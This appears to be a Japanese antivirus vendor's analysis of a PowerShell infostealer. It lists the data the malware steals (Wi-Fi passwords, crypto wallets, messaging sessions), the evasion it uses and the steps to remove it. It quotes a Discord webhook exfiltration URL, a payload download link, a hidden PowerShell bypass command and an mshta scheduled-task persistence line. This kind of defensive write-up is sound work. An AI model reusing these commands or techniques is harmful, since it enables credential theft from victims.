TrojanSpy.PS1.HUGLOGGER.THHAFBC
Windows
- マルウェアタイプ: スパイウェア/情報窃取型
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
スパイウェアは、以下のフォルダを追加します。
- %User Temp%\element-session → Deletes after execution
- %User Temp%\signal-session → Deletes after execution
- %User Temp%\steam-session → Deletes after execution
- %User Temp%\Crypto Wallets → Deletes after execution
- %User Temp%\Crypto Wallets\Armory → Deletes after execution
- %User Temp%\Crypto Wallets\Atomic → Deletes after execution
- %User Temp%\Crypto Wallets\Bitcoin → Deletes after execution
- %User Temp%\Crypto Wallets\Bytecoin → Deletes after execution
- %User Temp%\Crypto Wallets\Coinomi → Deletes after execution
- %User Temp%\Crypto Wallets\Dash → Deletes after execution
- %User Temp%\Crypto Wallets\Electrum → Deletes after execution
- %User Temp%\Crypto Wallets\Ethereum → Deletes after execution
- %User Temp%\Crypto Wallets\Exodus → Deletes after execution
- %User Temp%\Crypto Wallets\Guarda → Deletes after execution
- %User Temp%\Crypto Wallets\Liberty.jaxx → Deletes after execution
- %User Temp%\Crypto Wallets\Litecoin → Deletes after execution
- %User Temp%\Crypto Wallets\Monero → Deletes after execution
- %User Temp%\Crypto Wallets\Zcash → Deletes after execution
- %User Temp%\Crypto Wallets\Thunder → Deletes after execution
- %User Temp%\Files Grabber → Deletes after execution
- %User Temp%\SEG → Deletes after execution
- %Application Data%\SEG
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
スパイウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。
- %Application Data%\SEG\SEG.ps1
(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
スパイウェアは、以下のプロセスを追加します。
- %User Temp%\main.exe "https://{BLOCKED}d.com/api/webhooks/1140435802338382006/CGUpsFNYfwZOrzAl7AJDTXj3Fyclz-XkwuPwT_mRjXqnEv5PIDCMOVDmDtdwGD_m48-T "
- Powershell.exe "-NoProfile -ExecutionPolicy Bypass -Windowstyle hidden -File '{malware File Path}'"
自動実行方法
スパイウェアは、以下のファイルを作成します。
- %User Temp%\ip.txt → contains the machine's IP address. Later moved to %User Temp\SEG\ip.txt
- %User Temp%\system_info.txt → contains system information. Later moved to %User Temp%\SEG\system_info.txt
- %User Temp%\uuid.txt → contains OS version, OS build number, Display version, Computer model, and UUID. Later moved to %User Temp%\SEG\uuid.txt
- %User Temp%\cpu.txt → contains CPU information. Later moved to %User Temp%\SEG\cpu.txt
- %User Temp%\GPU.txt → contains GPU information. Later moved to %User Temp%\SEG\GPU.txt
- %User Temp%\mac.txt → contains MAC address. Later moved to %User Temp%\SEG\mac.txt
- %User Temp%\netstat.txt → contains network information. Later moved to %User Temp%\SEG\netstat.txt
- %User Temp%\WIFIPasswords.txt → Contains WIFI passwords. Later moved to %User Temp%\SEG\WIFIPasswords.txt
- %User Temp%\StartUpApps.txt → Contains Startup Commands. Later moved to %User Temp%\SEG\StartUpApps.txt
- %User Temp%\running-services.txt →Contains list of running services. Later moved to %User Temp%\SEG\running-services.txt
- %User Temp%\running-application.txt →Contains list of running applications. Later moved to %User Temp%\SEG\running-application.txt
- %User Temp%\Installed-Application.txt →Contains lists of installed applications. Later moved to %User Temp%\SEG\Installed-Application.txt
- %User Temp%\NetworkAdapters.txt →Contains lists of Network adapters. Later moved to %User Temp%\SEG\NetworkAdapters.txt
- %User Temp%\telegram-session.zip →Contains gathered files from %Application Data%\Telegram Desktop\tdata. Later moved to %User Temp%\SEG\telegram-session.zip
- %User Temp%\element-session.zip →Contains gathered files from %Application Data%\Element. Later moved to %User Temp%\SEG\element-session.zip
- %User Temp%\signal-session.zip →Contains gathered files from %Application Data%\Signal. Later moved to %User Temp%\SEG\signal-session.zip
- %User Temp%\steam-session.zip →Contains gathered files from &Program Files%\Steam. Later moved to %User Temp%\SEG\steam-session.zip
- %User Temp%\desktop-screenshot.png →Screenshot of Desktop. Later moved to %User Temp%\SEG\desktop-screenshot.png
- %User Temp%\DiskInfo.txt → Contains gathered Disk information. Later moved to %User Temp%\SEG\DiskInfo.txt
- %User Temp%\ProductKey.txt→ Contains gathered Product keys. Later moved to %User Temp%\SEG\ProductKey.txt
- %User Temp%\main.exe → Deletes after execution
- %User Temp%\SEG-LOG.zip → Deletes after execution
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
プロセスの終了
スパイウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。
- Telegram
- Element
- Signal
- Steam
- Discord
- Discordcanary
- Discordptb
ダウンロード活動
スパイウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
- https://{BLOCKED}b.com/KDot227/Powershell-Token-Grabber/releases/download/V4.1/main.exe
情報漏えい
スパイウェアは、以下の情報を収集します。
- Machine's IP address
- System information
- OS version
- OS Build number
- Display Version
- Computer Model
- UUID
- CPU
- GPU
- Total physical RAM
- MAC address
- Username
- Hostname
- Network information
- Manufacturer information of the machine
- Date and Time
- Boot up time
- List of Installed Anti Virus Products
- WIFI Passwords
- Screen Resolution
- Startup commands
- Running Process
- Running Services
- Installed Applications
- Network Adapters
- Files from Telegram directory
- Files from Element directory
- Files from Signal Directory
- Files from Steam Directory
- Desktop Screenshot
- Drive name
- Volume name
- Total Drive Size
- Used Drive Size
- Free Drive Size
- Product Key
- It gathers credentials from the following:
- Thunderbird
- CryptoWallets:
- Armory
- Atomic
- Bitcoin
- Bytecoin
- Coinomi
- Dash
- Electrum
- Ethereum
- Exodus
- Guarda
- Liberty.jaxx
- Litecoin
- Monero
- Zcash
情報収集
スパイウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。
- https://{BLOCKED}d.com/api/webhooks/1140435802338382006/CGUpsFNYfwZOrzAl7AJDTXj3Fyclz-XkwuPwT_mRjXqnEv5PIDCMOVDmDtdwGD_m48-T
その他
スパイウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- https://{BLOCKED}fy.org
スパイウェアは、以下を実行します。
- Hide its console window upon execution
- Copy files from the directories %User Profile%\Downloads, %User Profile%\Documents, and %User Profile%\Desktop to %User Temp%\FilesGrabber, following these conditions:
- Contains the following strings in their name:
- Accounts
- Login
- Metamask
- Crypto
- Code
- Coinbase
- Exodus
- Backupcode
- Token
- Seedphrase
- Private
- Pw
- Lastpass
- Keepass
- Keepassxc
- Nordpass
- Syncthing
- Dashlane
- Bitwarden
- Memo
- Keys
- Secret
- Recovery
- 2fa
- Pass
- Login
- Backup
- Discord
- Paypal
- Wallet
- With the following extension:
- .txt
- .doc
- .csv
- .rtf
- .docx
- With the following file size:
- Less than 5MB
- Deletes the following files if found in the machine:
- %Application Data%\DiscordTokenProtector\DiscordTokenProtector.exe
- %Application Data%\DiscordTokenProtector\secure.dat
- Exclude the following directory to be scanned by Windows Defender:
- %User Temp%
- %Application Data%\SEG
- Terminates itself if the following processes are found:
- Autoruns
- Autorunsc
- Dumpcap
- Fiddler
- Fakenet
- Hookexplorer
- Immunitydebugger
- Httpdebugger
- Importrec
- Lordpe
- Petools
- Processhacker
- Scylla_x64
- Sandman
- Sysinspector
- Tcpview
- Die
- Dumpcap
- Filemon
- Idaq
- Idaq64
- Joeboxcontrol
- Joeboxserver
- Ollydbg
- Proc_analyzer
- Procexp
- Procmon
- Pestudio
- Qemu-ga
- Qga
- Regmon
- Sniff_hit
- Sysanalyzer
- Tcpview
- Windbg
- Wireshark
- X32dbg
- X64dbg
- Vmwareuser
- Vmacthlp
- Vboxservice
- Vboxtray
- Xenservice
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
以下のスケジュールされたタスクを追加します:
- Name: SEG
- Trigger: AtLogon
- Action: mshta.exe 'vbsript:createobject("wscript.shell").run("Powershell.exe -ExecutionPolicy Bypass -File "%appdata%\SEG\SEG.ps1",0)(window.close)'
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
セーフモード時のスケジュールタスクの削除方法
- セーフモードのまま、以下の{タスク名}-{実行するタスク}のリストを使用し、以下のステップで確認する必要があります。
- Task Name: SEG
- Task to be run: mshta.exe 'vbsript:createobject(wscript.shell).run(Powershell.exe -ExecutionPolicy Bypass -File %appdata%\SEG\SEG.ps1,0)(window.close)'
- Windows 7 および Server 2008 (R2) をご使用の場合は、[スタート] > [コンピューター] をクリックします。
- Windows 8、8.1、10、Server 2012をご使用の場合は、画面左下で右クリックし、「ファイルエクスプローラ」をクリックします。
- PCの検索欄に、次のように入力します。
- System%\Tasks\{タスク名}
- ファイルを選択し、SHIFT+DELETEキーを押して削除します。
- レジストリエディタを開き、以下を実行してください。
- Windows 7およびServer 2008(R2)をご使用の場合は、[スタート]ボタンをクリックし、[検索]入力フィールドに「regedit」と入力し、Enterキーを押します。
- Windows 8、8.1、10、およびServer 2012(R2)をご使用の場合は、画面の左下隅を右クリックし、[実行]をクリックして、テキストボックスに「regedit」と入力します。
- レジストリエディタウィンドウの左パネルで、以下をダブルクリックします。
- HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows NT>CurrentVersion>Schedule>TaskCache>Tree>{タスク名}
- 作成されたエントリを探し、レジストリ値のデータをメモする。
- ID={タスクデータ}
- データを記録した後、レジストリキーを削除します。
- HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows NT>CurrentVersion>Schedule>TaskCache>Tree>{タスク名}
- レジストリエディタウィンドウの左パネルで、以下をダブルクリックします。
- HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows NT>CurrentVersion>Schedule>TaskCache>Tasks
- 左側のパネルで、手順6で配置したTask Dataと同じ名前のレジストリキーを探して削除します。
- ={タスクデータ}
- レジストリエディタを閉じます。
手順 5
以下のファイルを検索し削除します。
- %Application Data%\SEG\SEG.ps1
手順 6
以下のフォルダを検索し削除します。
- %Application Data%\SEG
手順 7
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「TrojanSpy.PS1.HUGLOGGER.THHAFBC」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 8
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「TrojanSpy.PS1.HUGLOGGER.THHAFBC」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください